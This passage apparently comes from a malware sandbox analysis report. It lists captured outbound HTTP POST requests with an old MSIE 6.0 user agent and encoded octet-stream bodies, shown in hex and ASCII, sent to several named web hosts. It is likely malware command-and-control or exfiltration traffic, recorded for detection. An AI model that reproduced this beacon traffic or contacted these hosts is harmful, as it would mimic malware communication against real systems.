s8TyzOCc3M9BKs+sMyoEAxM7VDlIbTVHFOpcfqHrQEHN02DQODJPIpIzVfv+D44qvkl7dn8Jr/CmCnpaCVci4NwrHIdN36dAukylxItnZFhVqDpctFpcnxoJDy9O6LuhQYRnOwpeJIf4zyzJmjHR/6ORO/HZ26Wq0Xj4c2Wkxpcyvo0rqjcUsnN6C8Bv6neXm0EkZcI6MugeCTWvUNll/uakOJ9UXwFmTLn+20GRfR0AqnKC2Q3/7gyq9nBTIVgLvqFYTMsKe8x0SzbgG9sGNXdAy76bPZsIB6jlZzFKz0g8f2EcipxM8tOanXWxyJ4vzHfvhhgBS2PjJ2UPFw2AwPrUlmoj42s62DZv9GReMU0gnhOv6wFfSjA1k4iwH/peZUAFqvK6f9bjl7Vz1Z62Q5kjKKDFgiNyQNnL1WSAfS6+kwcqik3jlTnb7QffWdrgOwsF2xGeBzpxyHnVvBBnd8zhFNSibzPQY5W6iq3pMPDTD7fAABr7+7WF8gTQW1tsEyiCxEJSAdwBVNqwt3/biTulSQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 54 53 45 39 4c 75 67 56 36 4d 38 4d 73 2b 50 6b 71 34 43 61 5a 31 76 39 4a 5a 4c 77 72 75 53 37 6e 4c 66 61 57 34 68 53 6f 49 31 49 56 61 31 2f 6a 32 6a 59 59 31 58 76 77 33 69 7a 33 76 6f 4e 6e 43 58 49 32 32 38 5a 33 56 69 67 34 76 6e 61 53 34 4a 33 4c 74 45 39 49 37 35 4d 73 4a 75 48 36 4e 6d 34 36 57 6e 49 6a 70 75 41 55 2f 32 46 2f 75 6a 67 61 34 45 54 34 74 36 74 6e 69 2f 77 79 77 67 4d 47 50 65 36 5a 56 58 6d 4b 43 7a 4d 2b 49 51 43 79 34 42 4e 79 53 45 6f 32 41 62 51 7a 43 58 6b 46 7a 61 65 56 4c 53 55 6c 4c 53 43 64 46 33 6c 35 53 4c 4c 54 55 72 71 69 74 42 54 74 4e 59 52 6d 33 6c 45 69 35 65 4c 35 53 6f 66 4e 43 44 49 4f 59 57 47 61 4f 50 59 76 64 51 43 36 35 34 58 6a 4f 31 46 47 34 46 4a 52 53 63 63 58 59 4b 43 58 42 41 75 41 4c 7a 6c 66 45 66 66 4f 77 6e 57 34 4c 58 50 67 74 43 75 51 6e 79 68 35 38 30 59 6b 44 68 5a 79 2b 6e 43 4a 33 42 31 6c 72 5a 4c 75 6a 33 41 77 77 38 6c 6b 38 53 44 47 47 76 62 54 71 61 65 62 31 77 69 49 66 39 55 32 34 4a 65 61 2f 49 6f 78 4f 4c 35 51 42 48 78 4b 39 43 56 67 78 64 74 64 33 67 48 75 56 32 76 72 51 79 4d 6a 69 50 39 61 58 6b 52 53 61 4a 6d 6d 35 36 63 30 50 4b 51 4d 6b 41 47 74 67 73 6c 4a 58 36 6d 6b 76 71 34 39 55 34 77 43 4f 62 50 34 6b 78 69 51 55 47 4b 69 54 4c 66 71 34 2b 59 72 36 54 2f 4b 61 4c 48 53 67 58 36 51 4c 61 52 57 61 57 69 63 44 30 43 54 4d 77 2f 4c 36 74 6f 70 74 47 54 6c 58 2b 34 71 79 61 42 4d 42 5a 54 49 74 4b 39 63 68 4e 52 59 78 6e 68 77 61 79 34 54 2b 4a 46 53 31 4b 6b 79 6e 63 47 4c 4f 73 57 36 56 79 61 36 6b 50 55 41 4b 36 70 47 73 46 62 70 41 76 42 78 66 75 44 76 77 49 35 39 6a 33 70 39 79 4f 6e 30 33 41 2f Data Ascii: TSE9LugV6M8Ms+Pkq4CaZ1v9JZLwruS7nLfaW4hSoI1IVa1/j2jYY1Xvw3iz3voNnCXI228Z3Vig4vnaS4J3LtE9I75MsJuH6Nm46WnIjpuAU/2F/ujga4ET4t6tni/wywgMGPe6ZVXmKCzM+IQCy4BNySEo2AbQzCXkFzaeVLSUlLSCdF3l5SLLTUrqitBTtNYRm3lEi5eL5SofNCDIOYWGaOPYvdQC654XjO1FG4FJRSccXYKCXBAuALzlfEffOwnW4LXPgtCuQnyh580YkDhZy+nCJ3B1lrZLuj3Aww8lk8SDGGvbTqaeb1wiIf9U24Jea/IoxOL5QBHxK9CVgxdtd3gHuV2vrQyMjiP9aXkRSaJmm56c0PKQMkAGtgslJX6mkvq49U4wCObP4kxiQUGKiTLfq4+Yr6T/KaLHSgX6QLaRWaWicD0CTMw/L6toptGTlX+4qyaBMBZTItK9chNRYxnhway4T+JFS1KkyncGLOsW6Vya6kPUAK6pGsFbpAvBxfuDvwI59j3p9yOn03A/
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 63 6f 71 6c 6a 30 68 65 75 63 38 43 46 73 41 39 69 32 31 78 32 62 74 45 55 52 37 51 7a 75 63 51 2f 42 55 53 72 78 42 4a 63 4e 33 59 4e 5a 59 70 35 4c 2f 76 6a 65 4c 56 43 45 51 51 6b 49 63 44 7a 50 30 4f 6d 64 6e 33 76 66 6a 42 2b 54 76 63 6d 75 73 76 70 55 67 6c 57 52 33 74 55 55 6d 47 6c 35 39 62 56 51 6f 55 64 35 6f 6b 76 47 58 76 47 76 61 79 41 7a 32 45 77 2b 67 66 55 69 74 50 48 32 47 6a 76 76 34 76 68 78 43 2f 57 4b 39 55 65 42 69 48 4a 35 42 30 43 6c 4a 68 51 65 43 50 68 6a 74 59 58 2f 51 30 78 42 30 31 4e 37 66 6c 50 71 73 64 31 66 55 50 70 42 76 57 42 57 47 36 6a 7a 71 5a 4c 61 79 79 48 2f 31 4b 32 39 37 78 41 4b 67 70 6d 5a 56 4a 4b 67 65 38 32 43 53 65 32 46 6e 79 2f 6e 72 68 73 6a 69 31 4a 67 38 31 4b 48 54 34 66 5a 47 44 4d 4c 52 4a 4b 37 41 42 54 53 38 66 70 63 70 42 50 71 4d 32 2f 39 31 4e 57 75 50 46 47 64 41 63 7a 69 48 2f 33 68 45 75 38 71 46 44 35 51 71 66 61 6e 6b 6c 63 57 45 68 4c 6e 54 6d 6e 41 59 51 31 4f 75 63 2f 41 4d 72 55 6f 46 55 62 32 45 47 74 73 63 4b 48 64 35 46 6e 46 39 47 66 68 44 4a 6f 4c 79 62 2f 2f 34 6b 76 47 2f 2b 34 38 5a 67 41 2f 70 67 66 6a 66 2b 50 38 6d 77 4d 7a 44 33 66 4b 78 49 36 32 71 45 51 65 7a 61 46 37 6a 53 61 71 67 76 68 31 68 72 39 4d 79 55 67 6a 7a 32 67 37 30 6d 42 35 41 67 42 7a 56 39 42 35 67 51 66 6d 68 7a 50 37 2b 4b 52 47 4c 55 75 35 77 47 58 53 77 4c 68 43 4c 49 43 65 45 2b 52 68 74 58 4b 73 4b 44 6e 46 6a 45 43 4f 32 35 6e 65 41 78 68 74 63 56 6a 45 78 54 6c 32 51 74 4c 47 37 39 36 54 70 4b 55 57 52 54 64 71 4b 5a 56 6b 6f 79 66 62 47 51 2b 64 67 36 68 48 47 7a 53 69 64 33 49 78 37 4c 33 54 39 37 30 67 7a 2f 6d 57 6e 36 6b 46 37 6c 79 64 64 4b 76 64 39 59 48 7a 52 70 74 42 54 38 35 45 66 38 45 2f 6a 6f 39 68 70 70 44 52 44 4c 32 50 6b 54 68 65 6e 35 65 36 2f 59 50 51 3d 3d Data Ascii: coqlj0heuc8CFsA9i21x2btEUR7QzucQ/BUSrxBJcN3YNZYp5L/vjeLVCEQQkIcDzP0Omdn3vfjB+TvcmusvpUglWR3tUUmGl59bVQoUd5okvGXvGvayAz2Ew+gfUitPH2Gjvv4vhxC/WK9UeBiHJ5B0ClJhQeCPhjtYX/Q0xB01N7flPqsd1fUPpBvWBWG6jzqZLayyH/1K297xAKgpmZVJKge82CSe2Fny/nrhsji1Jg81KHT4fZGDMLRJK7ABTS8fpcpBPqM2/91NWuPFGdAcziH/3hEu8qFD5QqfanklcWEhLnTmnAYQ1Ouc/AMrUoFUb2EGtscKHd5FnF9GfhDJoLyb//4kvG/+48ZgA/pgfjf+P8mwMzD3fKxI62qEQezaF7jSaqgvh1hr9MyUgjz2g70mB5AgBzV9B5gQfmhzP7+KRGLUu5wGXSwLhCLICeE+RhtXKsKDnFjECO25neAxhtcVjExTl2QtLG796TpKUWRTdqKZVkoyfbGQ+dg6hHGzSid3Ix7L3T970gz/mWn6kF7lyddKvd9YHzRptBT85Ef8E/jo9hppDRDL2PkThen5e6/YPQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 6f 73 30 53 4b 67 79 6a 33 38 38 65 30 68 39 56 64 77 4c 74 30 52 38 65 4b 35 2f 6b 50 4d 45 39 41 43 56 77 73 57 4b 70 4b 57 7a 71 34 41 4a 37 56 79 66 71 74 33 6c 66 33 70 4e 51 31 2f 78 52 35 50 62 78 71 7a 45 6b 6b 33 44 49 4f 4d 43 4a 51 72 62 52 72 33 42 35 75 53 6a 6c 31 58 4c 79 31 48 78 75 75 51 6e 76 46 56 4e 49 75 45 46 44 52 42 6a 48 48 35 6c 50 63 33 68 2b 76 32 4c 53 65 2f 2b 56 35 34 47 64 37 50 69 57 6c 74 2b 6d 72 7a 75 53 32 54 77 74 56 6a 4c 43 5a 32 46 75 49 4b 6e 70 6c 2f 57 6e 38 62 33 44 39 41 73 36 45 45 78 54 68 4f 6c 39 39 77 52 2f 34 76 38 79 61 34 34 73 65 66 49 56 7a 33 53 32 6d 42 72 42 67 51 73 33 58 4f 76 78 76 32 51 76 32 73 64 68 4a 6c 35 30 2b 72 42 72 30 4f 43 6f 42 36 4d 67 37 57 68 69 46 38 65 52 58 41 69 48 6a 74 6d 4c 4c 41 56 6f 2b 58 48 72 62 77 49 45 6f 2b 76 6f 54 31 6c 69 44 66 62 42 7a 57 6b 4a 61 47 36 54 39 75 36 72 78 32 47 70 4f 2b 51 77 44 50 52 51 45 58 52 46 72 45 56 35 69 69 49 30 78 46 53 75 69 73 6c 31 75 4f 66 64 63 55 6e 72 76 42 67 62 43 37 75 2b 64 6a 74 2f 67 72 61 2b 53 4a 69 47 48 4d 65 54 45 44 41 7a 75 77 44 73 61 35 75 39 56 58 48 64 32 55 7a 46 65 55 7a 2b 33 6d 6f 61 74 42 6e 68 36 50 6d 62 54 53 7a 45 2f 4c 2f 35 6b 54 70 73 6d 59 4c 78 62 2b 30 47 70 62 47 38 76 39 5a 32 65 76 42 73 43 54 33 41 4e 46 37 32 67 72 6a 30 32 44 62 78 62 47 39 65 58 39 31 67 45 4d 61 57 78 45 64 35 68 47 72 61 58 6a 6e 6f 2f 38 45 65 50 72 58 35 2b 46 6e 6b 2f 47 32 4e 39 67 55 46 4d 52 6a 4e 71 55 51 49 65 6d 44 57 45 66 65 67 51 49 62 2b 6e 51 77 49 4e 45 68 64 65 41 51 4a 54 67 45 67 6d 49 63 74 50 30 4b 49 53 35 76 6b 37 64 62 6c 4e 39 30 3d Data Ascii: os0SKgyj388e0h9VdwLt0R8eK5/kPME9ACVwsWKpKWzq4AJ7Vyfqt3lf3pNQ1/xR5PbxqzEkk3DIOMCJQrbRr3B5uSjl1XLy1HxuuQnvFVNIuEFDRBjHH5lPc3h+v2LSe/+V54Gd7PiWlt+mrzuS2TwtVjLCZ2FuIKnpl/Wn8b3D9As6EExThOl99wR/4v8ya44sefIVz3S2mBrBgQs3XOvxv2Qv2sdhJl50+rBr0OCoB6Mg7WhiF8eRXAiHjtmLLAVo+XHrbwIEo+voT1liDfbBzWkJaG6T9u6rx2GpO+QwDPRQEXRFrEV5iiI0xFSuisl1uOfdcUnrvBgbC7u+djt/gra+SJiGHMeTEDAzuwDsa5u9VXHd2UzFeUz+3moatBnh6PmbTSzE/L/5kTpsmYLxb+0GpbG8v9Z2evBsCT3ANF72grj02DbxbG9eX91gEMaWxEd5hGraXjno/8EePrX5+Fnk/G2N9gUFMRjNqUQIemDWEfegQIb+nQwINEhdeAQJTgEgmIctP0KIS5vk7dblN90=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 43 74 57 64 4f 55 6b 6b 34 4d 38 2f 2b 4a 4a 62 6d 4f 46 6d 70 47 4a 62 53 6f 35 6e 68 33 33 51 6a 52 73 73 59 5a 7a 58 6f 37 67 30 55 4b 4f 71 39 70 39 52 34 49 59 57 57 57 5a 33 47 37 53 6b 30 77 53 7a 65 32 33 4c 70 69 42 49 59 53 4e 77 39 61 6c 54 7a 54 6a 67 4c 6b 66 68 57 6f 47 6e 51 32 62 51 6e 62 50 32 39 70 6b 67 6f 30 6c 70 42 4c 70 77 4b 4d 79 6e 36 55 6e 56 4c 62 62 73 47 30 5a 56 52 33 55 49 45 38 47 64 52 4a 72 46 67 63 2b 67 74 4e 73 2b 34 39 52 33 5a 42 36 45 52 4d 44 66 35 55 65 38 54 43 48 2b 4f 7a 7a 36 50 4c 57 47 2f 45 63 35 77 65 74 34 4d 74 39 35 57 36 6f 61 43 56 43 6d 71 54 32 66 34 4a 54 2b 4f 46 4d 37 32 42 30 59 4c 4d 4d 6c 51 79 53 43 62 58 44 41 4a 54 35 42 4f 46 57 32 75 61 63 56 38 47 56 2b 49 47 69 6b 53 63 2f 71 4f 34 48 4a 59 36 4a 6d 58 4f 4f 74 63 76 49 39 6c 2f 6e 69 74 39 32 4f 33 52 6d 46 34 67 61 57 72 50 70 6d 53 76 63 52 32 4a 34 77 35 42 4f 62 47 7a 4f 47 41 43 74 74 47 2f 4b 37 47 75 76 51 68 69 6a 54 41 78 55 47 58 70 4e 59 64 7a 44 33 66 66 77 4f 55 6d 66 5a 72 57 6b 71 66 37 37 6f 6a 79 6f 77 49 56 45 55 31 33 75 35 63 6e 55 55 2b 68 6f 4f 63 46 7a 37 72 37 64 51 4a 54 71 73 74 63 4b 68 73 62 77 33 75 43 70 70 71 63 75 59 6a 54 6c 33 35 50 6c 48 51 33 78 2f 58 6e 45 54 77 67 39 45 71 6d 43 44 7a 74 54 57 47 71 43 4c 41 6a 66 34 32 69 30 47 46 6c 70 55 73 51 32 54 48 6b 32 32 38 32 4f 7a 31 6f 33 6d 73 64 32 32 70 33 78 4a 46 6c 61 6e 62 6b 6b 61 6d 57 74 6a 31 72 76 6c 4f 42 4e 63 75 2f 4f 62 57 67 4e 75 52 62 7a 52 6d 79 52 74 68 36 70 56 67 76 49 44 6a 44 34 64 35 74 6a 6c 33 73 51 74 71 53 5a 75 53 5a 34 50 53 77 59 76 30 6c 6b 79 62 74 52 76 75 68 6a 4e Data Ascii: CtWdOUkk4M8/+JJbmOFmpGJbSo5nh33QjRssYZzXo7g0UKOq9p9R4IYWWWZ3G7Sk0wSze23LpiBIYSNw9alTzTjgLkfhWoGnQ2bQnbP29pkgo0lpBLpwKMyn6UnVLbbsG0ZVR3UIE8GdRJrFgc+gtNs+49R3ZB6ERMDf5Ue8TCH+Ozz6PLWG/Ec5wet4Mt95W6oaCVCmqT2f4JT+OFM72B0YLMMlQySCbXDAJT5BOFW2uacV8GV+IGikSc/qO4HJY6JmXOOtcvI9l/nit92O3RmF4gaWrPpmSvcR2J4w5BObGzOGACttG/K7GuvQhijTAxUGXpNYdzD3ffwOUmfZrWkqf77ojyowIVEU13u5cnUU+hoOcFz7r7dQJTqstcKhsbw3uCppqcuYjTl35PlHQ3x/XnETwg9EqmCDztTWGqCLAjf42i0GFlpUsQ2THk2282Oz1o3msd22p3xJFlanbkkamWtj1rvlOBNcu/ObWgNuRbzRmyRth6pVgvIDjD4d5tjl3sQtqSZuSZ4PSwYv0lkybtRvuhjN
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 2b 71 69 73 53 68 57 79 34 4d 38 74 31 69 32 6b 2f 46 7a 5a 74 51 35 48 50 52 6f 6a 42 34 61 35 47 59 44 63 45 6c 41 51 78 50 43 7a 36 6e 54 39 56 49 6e 33 34 44 43 6c 32 6e 68 39 75 77 75 50 47 43 52 59 75 7a 52 42 6e 55 32 4f 55 6c 48 35 76 42 76 33 4a 46 6e 57 2f 72 57 6b 56 35 4a 39 37 43 2b 67 52 37 6f 78 41 75 74 31 7a 76 78 59 2f 52 6a 73 35 69 39 74 52 35 67 52 33 53 63 35 61 4d 39 77 4a 6a 47 51 39 6d 71 52 37 4f 75 44 4c 66 6a 58 45 6b 65 6f 78 33 71 42 52 6f 33 74 75 30 30 78 47 79 64 57 52 51 4a 55 55 31 6c 67 4e 65 46 38 31 34 77 6f 41 77 61 64 30 74 51 4d 77 4d 34 48 53 30 69 6b 4e 32 34 4d 54 73 4f 73 64 32 76 54 65 4c 5a 37 43 37 38 54 77 4e 70 72 47 77 75 66 41 36 4c 74 54 6b 6e 4e 49 69 68 6d 33 38 55 77 49 54 76 6a 62 70 30 5a 55 44 52 52 6f 45 6c 6c 38 6c 6f 41 47 31 37 30 74 30 79 34 30 38 49 4e 54 78 4c 63 66 6a 4d 4f 37 48 2b 59 55 73 59 2b 78 72 34 4f 38 6e 49 77 34 42 51 54 52 77 63 72 75 37 55 59 4e 65 37 61 50 37 73 4d 2b 53 53 35 4a 33 54 64 41 55 78 48 74 4c 69 49 79 68 2b 4e 70 59 37 35 59 6d 45 65 79 35 37 37 50 4d 42 73 48 34 45 38 4c 74 63 4a 57 73 30 63 52 66 66 50 51 56 50 41 4e 38 57 35 76 32 6a 61 62 4f 70 31 2b 36 30 50 69 59 4a 75 31 56 38 4f 6e 46 75 79 4e 33 6d 4a 69 79 52 43 43 51 75 6c 79 38 54 33 70 70 46 31 37 7a 50 48 34 42 6e 5a 61 39 34 4a 59 31 7a 4d 55 2b 42 32 41 36 78 45 56 59 34 43 39 4c 70 58 71 77 6d 4a 4b 71 78 74 65 47 47 42 46 31 51 43 76 62 59 50 50 4b 48 52 68 47 35 5a 6c 58 6d 66 57 75 56 37 78 71 48 6c 6a 6c 68 4b 33 31 72 71 38 4f 44 78 4f 64 45 7a 32 4e 5a 74 6b 65 52 68 51 4d 5a 4d 77 4d 51 3d Data Ascii: +qisShWy4M8t1i2k/FzZtQ5HPRojB4a5GYDcElAQxPCz6nT9VIn34DCl2nh9uwuPGCRYuzRBnU2OUlH5vBv3JFnW/rWkV5J97C+gR7oxAut1zvxY/Rjs5i9tR5gR3Sc5aM9wJjGQ9mqR7OuDLfjXEkeox3qBRo3tu00xGydWRQJUU1lgNeF814woAwad0tQMwM4HS0ikN24MTsOsd2vTeLZ7C78TwNprGwufA6LtTknNIihm38UwITvjbp0ZUDRRoEll8loAG170t0y408INTxLcfjMO7H+YUsY+xr4O8nIw4BQTRwcru7UYNe7aP7sM+SS5J3TdAUxHtLiIyh+NpY75YmEey577PMBsH4E8LtcJWs0cRffPQVPAN8W5v2jabOp1+60PiYJu1V8OnFuyN3mJiyRCCQuly8T3ppF17zPH4BnZa94JY1zMU+B2A6xEVY4C9LpXqwmJKqxteGGBF1QCvbYPPKHRhG5ZlXmfWuV7xqHljlhK31rq8ODxOdEz2NZtkeRhQMZMwMQ=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 50 38 4b 44 79 41 56 34 33 4d 2f 62 4d 32 4c 71 4c 41 6e 77 57 6e 34 79 46 57 2f 54 61 7a 77 4f 43 58 57 43 50 76 4d 58 6e 59 75 4e 61 51 34 75 5a 70 7a 69 38 73 61 37 45 72 71 45 4d 65 45 71 35 50 54 34 74 4d 37 39 72 41 43 2b 39 54 31 66 6f 74 54 76 52 71 4b 54 4c 2b 42 31 39 46 47 55 37 6a 59 51 38 41 79 4b 70 69 61 37 43 4e 4f 61 56 61 39 77 43 37 2f 77 55 52 6b 4f 54 50 35 58 74 78 79 39 31 4e 5a 34 75 41 78 50 55 6e 76 35 69 58 77 73 2f 67 78 6b 4f 70 61 4a 62 37 50 38 36 79 38 31 68 46 4e 43 75 70 35 30 59 32 56 66 61 79 51 58 5a 42 61 56 76 64 67 32 76 31 69 39 70 48 43 4a 6e 42 6b 78 2b 73 4e 68 36 5a 6e 45 4d 67 48 42 2f 62 41 67 76 4a 45 79 32 53 71 32 33 6a 4b 73 78 32 53 47 66 64 4d 53 65 61 54 30 66 57 46 71 46 46 34 5a 6a 48 6f 30 67 65 56 34 77 76 35 6a 56 77 73 69 5a 57 30 78 78 6c 59 6b 6c 78 68 51 57 6d 72 5a 73 46 38 77 31 2b 39 4c 52 68 75 34 6d 57 71 7a 65 39 39 2b 35 56 30 4e 79 51 42 59 30 68 62 35 59 76 39 2f 4c 55 72 43 2b 4f 5a 4f 42 37 50 2f 6c 56 51 6a 2b 2f 6b 35 77 63 79 4d 6b 58 64 53 6a 50 6f 6e 44 44 30 50 39 37 37 31 62 31 6e 6e 51 30 64 70 4f 4e 5a 77 6c 78 59 66 67 56 32 41 63 53 65 6e 65 63 38 2b 75 47 4f 50 42 6d 44 38 43 35 63 4c 74 48 52 36 68 75 58 70 48 38 4b 58 52 6f 39 49 48 46 45 4e 6e 65 64 58 69 30 57 35 46 6f 75 34 55 4f 4f 53 44 61 6b 68 4d 2b 4d 39 63 32 48 4c 55 2f 4b 42 4c 47 30 48 33 6a 5a 45 54 78 41 6d 31 4d 71 58 72 6e 4d 6e 47 78 45 6c 4e 51 48 6f 4a 58 72 44 45 43 64 75 6c 71 2f 68 44 2b 35 68 6e 50 71 2f 4b 72 33 30 4d 65 37 6d 43 6a 69 30 41 6d 74 39 77 57 47 7a 6a 61 6c 52 33 4d 74 72 37 45 4b 77 31 6e 35 53 66 71 47 45 58 47 4f 78 59 38 56 39 6b 4b 30 6a 2f 2b 32 2f 4a 61 31 75 34 44 41 65 4e 49 45 4a 6b 6e 4a 59 Data Ascii: P8KDyAV43M/bM2LqLAnwWn4yFW/TazwOCXWCPvMXnYuNaQ4uZpzi8sa7ErqEMeEq5PT4tM79rAC+9T1fotTvRqKTL+B19FGU7jYQ8AyKpia7CNOaVa9wC7/wURkOTP5Xtxy91NZ4uAxPUnv5iXws/gxkOpaJb7P86y81hFNCup50Y2VfayQXZBaVvdg2v1i9pHCJnBkx+sNh6ZnEMgHB/bAgvJEy2Sq23jKsx2SGfdMSeaT0fWFqFF4ZjHo0geV4wv5jVwsiZW0xxlYklxhQWmrZsF8w1+9LRhu4mWqze99+5V0NyQBY0hb5Yv9/LUrC+OZOB7P/lVQj+/k5wcyMkXdSjPonDD0P9771b1nnQ0dpONZwlxYfgV2AcSenec8+uGOPBmD8C5cLtHR6huXpH8KXRo9IHFENnedXi0W5Fou4UOOSDakhM+M9c2HLU/KBLG0H3jZETxAm1MqXrnMnGxElNQHoJXrDECdulq/hD+5hnPq/Kr30Me7mCji0Amt9wWGzjalR3Mtr7EKw1n5SfqGEXGOxY8V9kK0j/+2/Ja1u4DAeNIEJknJY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 54 53 45 39 4c 75 67 56 36 4d 38 4d 73 2b 50 6b 71 34 43 61 5a 31 76 39 4a 5a 4c 77 72 75 53 37 6e 4c 66 61 57 34 68 53 6f 49 31 49 56 61 31 2f 6a 32 6a 59 59 31 58 76 77 33 69 7a 33 76 6f 4e 6e 43 58 49 32 32 38 5a 33 56 69 67 34 76 6e 61 53 34 4a 33 4c 74 45 39 49 37 35 4d 73 4a 75 48 36 4e 6d 34 36 57 6e 49 6a 70 75 41 55 2f 32 46 2f 75 6a 67 61 34 45 54 34 74 36 74 6e 69 2f 77 79 77 67 4d 47 50 65 36 5a 56 58 6d 4b 43 7a 4d 2b 49 51 43 79 34 42 4e 79 53 45 6f 32 41 62 51 7a 43 58 6b 46 7a 61 65 56 4c 53 55 6c 4c 53 43 64 46 33 6c 35 53 4c 4c 54 55 72 71 69 74 42 54 74 4e 59 52 6d 33 6c 45 69 35 65 4c 35 53 6f 66 4e 43 44 49 4f 59 57 47 61 4f 50 59 76 64 51 43 36 35 34 58 6a 4f 31 46 47 34 46 4a 52 53 63 63 58 59 4b 43 58 42 41 75 41 4c 7a 6c 66 45 66 66 4f 77 6e 57 34 4c 58 50 67 74 43 75 51 6e 79 68 35 38 30 59 6b 44 68 5a 79 2b 6e 43 4a 33 42 31 6c 72 5a 4c 75 6a 33 41 77 77 38 6c 6b 38 53 44 47 47 76 62 54 71 61 65 62 31 77 69 49 66 39 55 32 34 4a 65 61 2f 49 6f 78 4f 4c 35 51 42 48 78 4b 39 43 56 67 78 64 74 64 33 67 48 75 56 32 76 72 51 79 4d 6a 69 50 39 61 58 6b 52 53 61 4a 6d 6d 35 36 63 30 50 4b 51 4d 6b 41 47 74 67 73 6c 4a 58 36 6d 6b 76 71 34 39 55 34 77 43 4f 62 50 34 6b 78 69 51 55 47 4b 69 54 4c 66 71 34 2b 59 72 36 54 2f 4b 61 4c 48 53 67 58 36 51 4c 61 52 57 61 57 69 63 44 30 43 54 4d 77 2f 4c 36 74 6f 70 74 47 54 6c 58 2b 34 71 79 61 42 4d 42 5a 54 49 74 4b 39 63 68 4e 52 59 78 6e 68 77 61 79 34 54 2b 4a 46 53 31 4b 6b 79 6e 63 47 4c 4f 73 57 36 56 79 61 36 6b 50 55 41 4b 36 70 47 73 46 62 70 41 76 42 78 66 75 44 76 77 49 35 39 6a 33 70 39 79 4f 6e 30 33 41 2f Data Ascii: TSE9LugV6M8Ms+Pkq4CaZ1v9JZLwruS7nLfaW4hSoI1IVa1/j2jYY1Xvw3iz3voNnCXI228Z3Vig4vnaS4J3LtE9I75MsJuH6Nm46WnIjpuAU/2F/ujga4ET4t6tni/wywgMGPe6ZVXmKCzM+IQCy4BNySEo2AbQzCXkFzaeVLSUlLSCdF3l5SLLTUrqitBTtNYRm3lEi5eL5SofNCDIOYWGaOPYvdQC654XjO1FG4FJRSccXYKCXBAuALzlfEffOwnW4LXPgtCuQnyh580YkDhZy+nCJ3B1lrZLuj3Aww8lk8SDGGvbTqaeb1wiIf9U24Jea/IoxOL5QBHxK9CVgxdtd3gHuV2vrQyMjiP9aXkRSaJmm56c0PKQMkAGtgslJX6mkvq49U4wCObP4kxiQUGKiTLfq4+Yr6T/KaLHSgX6QLaRWaWicD0CTMw/L6toptGTlX+4qyaBMBZTItK9chNRYxnhway4T+JFS1KkyncGLOsW6Vya6kPUAK6pGsFbpAvBxfuDvwI59j3p9yOn03A/
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 6f 52 6e 58 57 61 66 51 38 63 2b 49 2f 67 52 76 56 68 55 6f 68 58 44 70 64 68 6f 64 68 6c 44 30 79 35 59 6d 4a 48 56 71 48 59 6e 50 57 66 6d 56 50 5a 4a 71 58 4e 4c 42 6b 76 72 71 50 41 5a 61 38 57 33 74 66 53 69 4d 6e 31 50 4e 52 73 71 48 52 41 77 7a 31 6b 4f 71 71 53 36 4c 41 4f 41 4a 67 79 78 69 50 6b 47 43 6c 7a 4c 67 37 4b 34 54 4d 4f 65 76 43 2b 58 62 50 5a 42 73 70 73 47 72 64 54 70 47 33 44 4e 63 62 38 74 36 53 51 39 74 68 7a 6c 75 2b 39 4a 56 55 38 32 64 59 41 73 73 41 63 75 7a 65 4a 4f 42 4f 51 63 44 51 6f 57 61 39 74 33 70 38 50 54 6c 70 39 55 6c 2f 79 6b 75 74 42 42 4a 6a 6e 59 50 56 31 6e 31 67 53 6a 4a 35 34 35 7a 65 52 67 41 75 43 4b 6c 30 42 52 66 68 47 4a 68 62 56 35 2f 4c 48 6b 2f 72 79 5a 43 5a 2b 79 48 34 4b 6e 4f 47 56 6c 55 42 5a 38 2f 34 33 64 2f 4d 69 78 35 79 32 39 74 30 4f 30 2b 48 31 6b 2f 42 35 66 30 56 43 68 59 35 2b 41 4d 6b 38 43 70 78 43 2b 58 39 64 42 6d 2b 56 43 74 67 37 59 50 2b 4f 43 53 61 49 62 37 68 49 52 36 41 46 54 45 78 37 30 6a 67 41 6c 34 70 4c 51 75 61 68 52 48 6d 48 78 6e 35 46 63 48 54 4c 62 56 72 67 35 52 47 4b 37 66 70 74 65 4e 66 79 4a 6f 78 58 43 41 70 42 39 39 43 79 2f 6b 69 69 34 2b 2f 63 6a 69 36 7a 58 70 6f 35 4d 68 6a 67 31 72 71 4b 7a 4b 4d 47 65 4b 37 4a 7a 58 6a 52 51 67 6d 41 4f 55 4b 70 68 71 61 30 57 4b 4f 58 67 6e 67 31 32 4b 53 72 71 6f 38 67 62 7a 36 36 70 44 55 4e 49 64 42 31 